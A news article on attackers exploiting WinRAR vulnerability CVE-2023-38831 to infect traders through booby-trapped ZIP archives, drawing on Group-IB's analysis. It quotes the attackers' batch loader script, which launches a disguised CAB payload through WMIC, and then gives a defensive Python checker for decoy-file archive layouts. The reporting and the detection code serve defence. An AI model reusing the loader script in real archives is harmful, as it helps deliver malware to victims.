A newly discovered zero-day in the widely used WinRAR
file-compression program has been exploited for four months by
unknown attackers who are using it to install malware when targets
open booby-trapped JPGs and other innocuous-looking files inside
file archives.
The vulnerability, residing in the way WinRAR processes the ZIP
file format, has been under active exploit since April in
securities trading forums, researchers from security firm Group-IB
reported Wednesday[1]. The attackers have been
using the vulnerability to remotely execute code that installs
malware from families including DarkMe, GuLoader, and Remcos
RAT.
From there, the criminals withdraw money from broker accounts.
The total amount of financial losses and total number of victims
infected is unknown, although Group-IB said it has tracked at least
130 individuals known to have been compromised. WinRAR developers
fixed the vulnerability, tracked as CVE-2023-38831, earlier this
month.
Weaponizing ZIP archives
“By exploiting a vulnerability within this program, threat
actors were able to craft ZIP archives that serve as carriers for
various malware families,” Group-IB Malware Analyst Andrey
Polovinkin wrote. “Weaponized ZIP archives were distributed on
trading forums. Once extracted and executed, the malware allows
threat actors to withdraw money from broker accounts. This
vulnerability has been exploited since April 2023.”
While Group-IB hasn’t detected the vulnerability being exploited in
other settings or installing other malware families, it wouldn’t be
surprising if that’s the case. In 2019, a similar WinRAR
vulnerability tracked as CVE-2018-20250 came
under active attack[2] within weeks of becoming
public[3]. It was used in no fewer
than five separate campaigns[4] by separate threat
actors.
WinRAR has more than 500 million users who rely on the program
to compress large files to make them more manageable and quicker to
upload and download. It’s not uncommon for people to immediately
decompress the resulting ZIP files without inspecting them first.
Even when people attempt to examine them for malice, antivirus
software often has trouble peering into the compressed data to
identify malicious code.
The malicious ZIP archives Group-IB found were posted on public
forums used by traders to swap information and discuss topics
related to cryptocurrencies and other securities. In most cases,
the malicious ZIPs were attached to forum posts. In other cases,
they were distributed on the file storage site catbox[.]moe.
Group-IB identified eight popular trading forums used to spread the
files.
In one case, administrators of one of the abused forums warned
users after discovering harmful files were distributed on the
platform.
“Despite this warning, further posts were made and more users
were affected,” Polovinkin wrote. “Our researchers also saw
evidence that the threat actors were able to unblock accounts that
were disabled by forum administrators to continue spreading
malicious files, whether by posting in threads or sending private
messages.” The images below show some of the postings used to
entice people into downloading them and a warning issued by an
admin of one of the abused forums.
A post made by the threat actor.
Another example.
A third.
One more.
Admin warning of the malicious ZIP file.
One forum participant reported that the attackers gained
unauthorized access to a broker account. An attempted withdrawal of
funds failed for reasons that aren’t entirely clear.
Intricate infection chain
The attackers’ exploit launched an intricate infection chain
illustrated below:
Polovinkin wrote:
The cybercriminals are exploiting a vulnerability that allows
them to spoof file extensions, which means that they are able to
hide the launch of malicious code within an archive masquerading as
a ‘.jpg’, ‘.txt’, or any other file format. They create a ZIP
archive containing both malicious and non-malicious files. When the
victim opens a specially crafted archive, the victim will usually
see an image file and a folder with the same name as the image
file.
Screenshot showing archive contents, including a .jpg file.
If the victim clicks on the decoy file, which can masquerade as
an image, a script is executed that launches the next stage of the
attack. This process is illustrated in Figure 10 (below).
Figure 10
During our investigation, we noticed that the ZIP archive has a
modified file structure. There are two files in the archive: a
picture and a script. Instead of the image opening, the script is
launched. The script’s main purpose is to initiate the next stage
of the attack. This is done by running a minimized window of
itself. It then searches for two specific files, namely
“Screenshot_05-04-2023.jpg” and “Images.ico.” The JPG file is an
image that the victim opened initially. “Images.ico” is an SFX CAB
archive designed to extract and launch new files. Below is an
example of the script:
@echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit
cd %TEMP%
for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"') do for /F "delims=" %%G in ('dir /b /s "Images.ico"') do WMIC process call create "%%~G" && "%%~K" && cd %CD% && exit
exit
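The archive layout Polovinkin describes, an image file sitting next to a folder of the same name that holds a script, is something a defender can check for before an archive is ever opened in WinRAR. The following is an added example written for this article, not code from Group-IB or from WinRAR: it inspects a ZIP's entry names and reports every file hidden inside a folder whose name matches a sibling file. The archives it scans are constructed in the code itself with placeholder contents, and the file names reuse the ones quoted above; the trailing-whitespace normalisation is a defensive assumption, so near-identical names are reported as well.

```python
import io
import posixpath
import zipfile


def build_sample_archive() -> bytes:
    """Constructed sample: mirrors the decoy-image-plus-same-name-folder layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Screenshot_05-04-2023.jpg", b"\xff\xd8\xff\xe0 placeholder jpeg bytes")
        zf.writestr("Screenshot_05-04-2023.jpg/Screenshot_05-04-2023.jpg.cmd",
                    "@echo off\r\nrem placeholder, not the real script\r\n")
        zf.writestr("Screenshot_05-04-2023.jpg/Images.ico", b"placeholder cab bytes")
    return buf.getvalue()


def build_clean_archive() -> bytes:
    """Constructed control archive with an ordinary file/folder layout."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.txt", "quarterly notes")
        zf.writestr("charts/chart1.png", b"\x89PNG placeholder")
    return buf.getvalue()


def find_decoy_pairs(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Return (decoy_file, hidden_file) pairs: hidden_file lives in a folder whose
    name equals a sibling file's name once trailing whitespace is stripped."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = [info.filename for info in zf.infolist()]
    # Index plain file entries by (parent directory, normalised base name).
    files: dict[tuple[str, str], list[str]] = {}
    for name in names:
        if name.endswith("/"):
            continue
        parent, base = posixpath.split(name)
        files.setdefault((parent, base.rstrip()), []).append(name)
    findings = []
    for name in names:
        if name.endswith("/") or "/" not in name:
            continue
        parent, _ = posixpath.split(name)
        grandparent, folder = posixpath.split(parent)
        # Any sibling file whose normalised name equals this folder's name is a decoy.
        for decoy in files.get((grandparent, folder.rstrip()), []):
            findings.append((decoy, name))
    return findings


if __name__ == "__main__":
    for decoy, hidden in find_decoy_pairs(build_sample_archive()):
        print(f"decoy {decoy!r} shadows hidden entry {hidden!r}")
```

The check reads only the central directory, so it can run on a mail gateway or download scanner without extracting anything.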
Now that the vulnerability has become widely known, it will
likely become widely exploited. Anyone using WinRAR should update
to version 6.23[5] before using the program
again.